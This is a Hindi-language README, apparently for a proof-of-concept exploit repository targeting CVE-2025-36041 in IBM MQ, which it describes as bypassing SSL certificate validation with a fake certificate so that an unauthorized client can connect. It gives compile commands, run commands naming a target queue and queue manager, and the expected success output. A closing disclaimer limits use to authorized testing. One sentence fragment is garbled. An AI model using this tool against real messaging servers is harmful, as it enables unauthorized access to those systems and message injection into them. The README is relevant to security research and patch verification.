
IBM MQ में CVE-2025-36041 भेद्यता का शोषण (C)
इस रिपॉजिटरी में CVE-2025-36041 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण शामिल है, जो IBM MQ (मैसेज क्यू) में एक कमजोरी है, जो SSL प्रमाणपत्र सत्यापन को बायपास करने की अनुमति देती है। एक नकली SSL प्रमाणपत्र इंजेक्ट करके और अनुकूलित MQCONNX पैरामीटर का उपयोग करके, एक अनधिकृत क्लाइंट कनेक्शन IBM MQ सर्वर से स्थापित किया जा सकता है।
"Hello MQ") भेजता है।सुनिश्चित करें कि IBM MQ क्लाइंट लाइब्रेरी स्थापित हैं और पर्यावरण चर (MQ_INCLUDE_PATH, MQ_LIB_PATH) तदनुसार सेट हैं।
gcc exploit.c argparse.c -o CVE-2025-36041
-I/path/to/mqm/include
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041
-p /path/to/fake/ssl
-n TARGET.QUEUE.NAME
-m QM1
पैरामीटर:
-p, --path नकली SSL KeyRepository निर्देशिका का पथ।-n, --name संदेश खोलने और भेजने के लिए लक्ष्य कतार का नाम।-m, --qmgr कतार प्रबंधक का नाम।./CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
यदि सफल होता है, तो आप देखेंगे:
[+] Starting connection to IBM MQ... [+] Connected successfully with fake SSL! [+] Message sent successfully!
केवल अधिकृत पेनिट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए। इस PoC का अनधिकृत उपयोग स्थानीय कानूनों और विनियमों का उल्लंघन कर सकता है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
लेखक: Byte Reaper CVE: CVE-2025-36041